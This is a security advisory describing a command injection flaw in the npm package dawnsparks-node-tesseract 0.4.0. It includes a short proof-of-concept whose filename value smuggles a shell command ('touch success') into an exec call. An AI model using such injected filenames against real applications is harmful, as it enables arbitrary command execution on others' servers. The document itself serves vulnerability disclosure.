Vulnerability in dawnsparks-node-tesseract

This report details an arbitrary command injection (ACI) vulnerability affecting dawnsparks-node-tesseract@0.4.0.

Package source

Package description

"A simple wrapper for the Tesseract OCR package for node.js"

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If an attacker-controlled (user-named) image file is passed to the process function of the package, the attacker can execute arbitrary commands on the operating system that runs this package.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

To exploit this vulnerability, a user must submit an image file to a Node.js application that is using "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the user's submitted image filename contains shell commands, those will be evaluated, allowing the user to execute arbitrary commands on the application's server.

The proof-of-concept (PoC) program below illustrates the issue for version 0.4.0. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.

// PoC for dawnsparks-node-tesseract@0.4.0: the filename is interpolated into a shell command
var PUT = require('dawnsparks-node-tesseract');
// Attacker-controlled filename carrying shell metacharacters
var user_image_filename = "; touch success;#";
try {
    new PUT.process(user_image_filename, {}, function () {});
} catch (e) {
    console.log(e);
}

Environment: Node.js v15.5.1 on Linux

Steps to reproduce:

  1. npm i dawnsparks-node-tesseract@0.4.0
  2. Create a file, e.g., poc0.js, containing the PoC code.
  3. Execute the file: node poc0.js

A file called success will be created as a result of the execution of the PoC.

Remarks

This vulnerability was originally discovered in version 0.3.3 of this package, which was previously named "huedawn-tesseract" (unpublished from npm).